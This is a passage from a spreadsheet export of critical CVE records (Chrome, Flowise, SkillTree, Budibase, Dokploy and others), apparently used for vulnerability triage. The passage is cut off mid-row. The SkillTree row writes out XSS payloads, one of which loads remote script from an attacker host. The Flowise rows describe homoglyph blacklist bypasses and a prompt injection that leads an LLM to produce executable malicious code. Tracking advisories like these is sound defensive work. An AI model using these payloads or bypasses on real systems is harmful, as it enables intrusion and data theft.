          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated Kubernetes tenant to hijack or permanently destroy another tenant's cluster-level RBAC permissions, caused by cluster-scoped RBAC objects being keyed solely by the bare CR name with no namespace disambiguation, allowing a same-named `InstanaAgent` CR in an attacker-controlled namespace to silently overwrite the shared `ClusterRoleBinding` or delete it outright and revoke the victim agent's cluster monitoring access.</t>
        </is>
      </c>
      <c r="M107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47705</t>
        </is>
      </c>
      <c r="C108" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D108" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E108" s="5" t="inlineStr"/>
      <c r="F108" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G108" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L108" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Version 3.16.1 has a CSV injection vulnerability in the result export functionality. The application does not sanitize or escape user-supplied input when generating CSV files. An attacker can inject spreadsheet formulas into input fields, which are later executed when an administrator opens the exported CSV in spreadsheet software such as Microsoft Excel or LibreOffice Calc. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47705</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53649</t>
        </is>
      </c>
      <c r="C109" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D109" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G109" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-434, CWE-942</t>
        </is>
      </c>
      <c r="L109" s="5" t="inlineStr">
        <is>
          <t>Joro is a web exploitation framework. Prior to version 1.1.1, Joro's default proxy mode exposes a local API on 127.0.0.1:9090 that performs no authentication and applies a wildcard CORS policy. Because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript on any page the operator visits can reach privileged endpoints - including uploading a native plugin and triggering a restart - directly through the operator's browser, with no preflight or credentials. Since plugins execute on load, this yields unauthenticated remote code execution as the operator's user from a single page visit. This issue has been patched in version 1.1.1.</t>
        </is>
      </c>
      <c r="M109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53649</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54694</t>
        </is>
      </c>
      <c r="C110" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D110" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G110" s="5" t="inlineStr">
        <is>
          <t>java, aws</t>
        </is>
      </c>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-183, CWE-20, CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="L110" s="5" t="inlineStr">
        <is>
          <t>SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "&lt;img src=x onerror=alert(1)&gt;"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `&lt;img src=x onerror=alert(1)&gt;`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "&lt;img src=x"`, `firstName = "onerror=import('//nsas.cc/p')&gt;"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.</t>
        </is>
      </c>
      <c r="M110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54694</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54725</t>
        </is>
      </c>
      <c r="C111" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D111" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G111" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L111" s="5" t="inlineStr">
        <is>
          <t>vault-secrets-webhook is a Kubernetes mutating webhook that makes direct secret injection into Pods possible. Prior to 1.23.1, parseVaultConfig() in pkg/webhook/config.go accepts the vault.security.banzaicloud.io/vault-addr annotation, MutateConfigMap and MutateSecret call newVaultClient in pkg/webhook/webhook.go, and vault.security.banzaicloud.io/vault-serviceaccount can cause a ServiceAccount JWT to be sent to an attacker-controlled Vault address. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54725</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72877</t>
        </is>
      </c>
      <c r="C112" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G112" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr">
        <is>
          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, the dockerImage field is interpolated without quoting into shell commands in buildRemoteDocker() in packages/server/src/utils/providers/docker.ts and is validated only as an optional string. An authenticated user with application create or update permission can use shell command substitution in dockerImage to execute arbitrary commands on the local build host or a remote SSH build target, exposing host secrets and other projects. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72877</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73300</t>
        </is>
      </c>
      <c r="C113" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G113" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L113" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.0, the MySQL integration component in Budibase is configured with multipleStatements: true, enabling execution of multiple SQL statements in a single query. Attackers can inject malicious SQL commands through user input fields, leading to complete database compromise. This vulnerability is fixed in 3.40.0.</t>
        </is>
      </c>
      <c r="M113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73300</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73843</t>
        </is>
      </c>
      <c r="C114" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G114" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668, CWE-862</t>
        </is>
      </c>
      <c r="L114" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a complete, open-source developer platform for Kubernetes. Prior to 1.0.2 and 1.1.2, internal/cluster-gateway/server.go served caller-facing management APIs on the externally reachable agent listener without authentication, allowing network-reachable attackers to invoke /api/proxy/ and /api/exec/ operations, proxy the data-plane Kubernetes API, and execute commands in workload pods in multi-cluster deployments. This issue is fixed in versions 1.0.2 and 1.1.2.</t>
        </is>
      </c>
      <c r="M114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73843</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82100</t>
        </is>
      </c>
      <c r="C115" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="inlineStr"/>
      <c r="G115" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to cause a denial of service due to a path traversal vulnerability.</t>
        </is>
      </c>
      <c r="M115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82100</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82107</t>
        </is>
      </c>
      <c r="C116" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="inlineStr"/>
      <c r="G116" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L116" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to obtain sensitive information and bypass security restrictions due to improper authentication.</t>
        </is>
      </c>
      <c r="M116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82107</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87494</t>
        </is>
      </c>
      <c r="C117" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G117" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H117" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I117" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L117" s="5" t="inlineStr">
        <is>
          <t>Use after free in Browser in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87494</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87512</t>
        </is>
      </c>
      <c r="C118" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G118" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H118" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I118" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L118" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87512</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87528</t>
        </is>
      </c>
      <c r="C119" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G119" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H119" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I119" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L119" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Rust in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87528</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87621</t>
        </is>
      </c>
      <c r="C120" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G120" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H120" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I120" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>Out of bounds write in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87621</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87654</t>
        </is>
      </c>
      <c r="C121" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G121" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H121" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I121" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L121" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87654</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70470</t>
        </is>
      </c>
      <c r="C122" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G122" s="5" t="inlineStr">
        <is>
          <t>java, python</t>
        </is>
      </c>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise validatePythonCodeForDataFrame in packages/components/src/pythonCodeValidator.ts can be bypassed with Unicode homoglyph identifiers, allowing arbitrary Python execution inside Pyodide and full OS command execution on the Flowise host via Pyodide js module interop. The validator gates pyodide.runPythonAsync in packages/components/nodes/agents/CSVAgent/CSVAgent.ts and packages/components/nodes/agents/AirtableAgent/AirtableAgent.ts with an ASCII word-boundary blacklist. JavaScript regex word boundaries are ASCII-only, while Python 3 NFKC-normalizes identifiers at parse time, so homoglyph forms such as __cl𝐚ss__, __subcl𝐚sses__, __b𝐚se__, and __b𝐮iltins__ bypass the blacklist and are parsed as their ASCII equivalents. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70470</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70477</t>
        </is>
      </c>
      <c r="C123" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="D123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G123" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, a prompt injection sent to a chatflow using a CSV Agent node can cause the LLM to respond with a malicious Python script that bypasses the blocklist validator and executes in an unsandboxed Pyodide environment. The specific flaw exists within the run method of the CSV_Agents class, where untrusted data is used to construct an LLM prompt and the resulting pythonCode is validated by validatePythonCodeForDataFrame before execution. An attacker can leverage this to execute arbitrary code in the context of the service account. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70477</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41242</t>
        </is>
      </c>
      <c r="C124" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G124" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H124" s="5" t="inlineStr">
        <is>
          <t>protobufjs_project:protobufjs</t>
        </is>
      </c>
      <c r="I124" s="5" t="inlineStr">
        <is>
          <t>2026-04-18</t>
        </is>
      </c>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr">
        <is>
          <t>protobufjs compiles protobuf definitions into JavaScript (JS) functions. In versions prior to 8.0.1 and 7.5.5, attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition. Versions 8.0.1 and 7.5.5 patch the issue.</t>
        </is>
      </c>
      <c r="M124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41242</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43114</t>
        </is>
      </c>
      <c r="C125" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G125" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H125" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I125" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>CWE-480</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_pipapo_avx2: don't return non-matching entry on expiry
New test case fails unexpectedly when avx2 matching functions are used.
The test first loads a ranomly generated pipapo set
with 'ipv4 . port' key, i.e.  nft -f foo.
This works.  Then, it reloads the set after a flush:
(echo flush set t s; cat foo) | nft -f -
This is expected to work, because its the same set after all and it was
already loaded once.
But with avx2, this fails: nft reports a clashing element.
The reported clash is of following form:
    We successfully re-inserted
      a . b
      c . d
Then we try to insert a . d
avx2 finds the already existing a . d, which (due to 'flush set') is marked
as invalid in the new generation.  It skips the element and moves to next.
Due to incorrect masking, the skip-step finds the next matching
element *only considering the first field*,
i.e. we return the already reinserted "a . b", even though the
last field is different and the entry should not have been matched.
No such error is reported for the generic c implementation (no avx2) or when
the last field has to use the 'nft_pipapo_avx2_lookup_slow' fallback.
Bisection points to
7711f4bb4b36 ("netfilter: nft_set_pipapo: fix range overlap detection")
but that fix merely uncovers this bug.
Before this commit, the wrong element is returned, but erronously
reported as a full, identical duplicate.
The root-cause is too early return in the avx2 match functions.
When we process the last field, we should continue to process data
until the entire input size has been consumed to make sure no stale
bits remain in the map.</t>
        </is>
      </c>
      <c r="M125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43114</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45272</t>
        </is>
      </c>
      <c r="C126" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="D126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G126" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>CWE-829, CWE-94</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr">
        <is>
